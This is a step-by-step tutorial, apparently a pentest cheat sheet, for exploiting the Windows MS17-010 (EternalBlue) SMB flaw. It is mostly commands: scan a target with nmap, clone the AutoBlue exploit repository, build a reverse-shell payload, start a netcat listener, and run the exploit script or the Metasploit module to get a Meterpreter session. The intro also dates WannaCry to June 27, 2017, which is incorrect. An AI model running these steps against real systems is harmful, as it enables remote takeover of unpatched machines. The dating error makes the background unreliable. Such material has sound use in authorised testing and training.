# Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue) ## **MS17-010 EternalBlue Exploit** * EternalBlue (MS17-010/CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of. * The EternalBlue exploit was developed by the NSA (National Security Agency) to take advantage of the MS17-010 vulnerability and was leaked to the public by a hacker group called the Shadow Brokers in 2017. * The EternalBlue exploit takes advantage of a vulnerability in the Windows SMBv1 protocol that allows attackers to send specially crafted packets that consequently facilitate the execution of arbitrary commands. * The EternalBlue exploit was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible. * This vulnerability affects multiple versions of Windows: * Windows Vista * Windows 7 * Windows Server 2008 * Windows 8.1 * Windows Server 2012 * Windows 10 * Windows Server 2016 * Microsoft released a patch for the vulnerability in March, 2017, however, many users and companies have still not yet patched their systems. * The EternalBlue exploit has a MSF auxiliary module that can be used to check if a target system if vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems. * The EternalBlue exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system. * In addition to MSF modules, we can also manually exploit the vulnerability by utilizing publicly available exploit code. \ ## Attack Flow for the Windows MS17-010 SMB Vulnerability (EternalBlue) ### 1. **Determine Vulnerability** **Objective:** Identify if the target system is vulnerable to Eternal Blue. **Command:** ```bash nmap -sV -O --script=smb-vuln-ms17-010 ``` **Description:** Scan the target system to check for the MS17-010 vulnerability. ### 2. **Clone the Exploit Repository** **Objective:** Download the necessary exploit code for MS17-010. **Command:** ```bash git clone https://github.com/3ndG4me/AutoBlue-MS17-010 cd AutoBlue-MS17-010 ``` **Description:** Clone the `AutoBlue-MS17-010` repository and navigate to its directory. ### 3. **Install Prerequisites** **Objective:** Install the required dependencies for the exploit tool. **Command:** ```bash sudo pip install -r requirements.txt ``` **Description:** Use the provided `requirements.txt` file to install necessary Python packages. ### 4. **Generate the Shell Payload** **Objective:** Create a reverse shell payload for exploitation. **Command:** ```bash cd shellcode chmod +x shell_prep.sh ./shell_prep.sh ``` **Description:** Navigate to the `shellcode` folder, make `shell_prep.sh` executable, and run it to generate the shell payload using `msfvenom`. **Inside `shell_prep.sh`:** * **Set LHOST and LPORT values.** * **Generate a regular cmd shell.** * **Choose to create a stageless payload.** ### 5. **Set Up NetCat Listener** **Objective:** Prepare to receive the reverse shell connection. **Command:** ```bash nc -nvlp ``` **Description:** Start a NetCat listener on the specified port to capture the reverse shell. ### 6. **Execute the Exploit** **Objective:** Run the Eternal Blue exploit code to establish a reverse shell. **Command:** ```bash cd .. chmod +x eternalblue_exploit7.py python eternalblue_exploit7.py shellcode/sc_x64 ``` **Description:** Navigate back to the main repository folder, make the exploit script executable, and run it to exploit the target and establish a reverse shell connection. ### 7. **Alternative Method Using Metasploit** **Objective:** Use Metasploit to exploit the MS17-010 vulnerability. **Command:** ```bash msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST set LPORT exploit ``` **Description:** Use the `ms17_010_eternalblue` module in Metasploit to exploit the target system and establish a Meterpreter session. *** *** *** **`Hacker's Mantra:`**`If hackers, if anyone committing a criminal act, wants to reduce their risk, they obviously don’t involve anybody else. The greater the circle of people that know what you’re doing, the higher the risk. - Kevin Mitnick`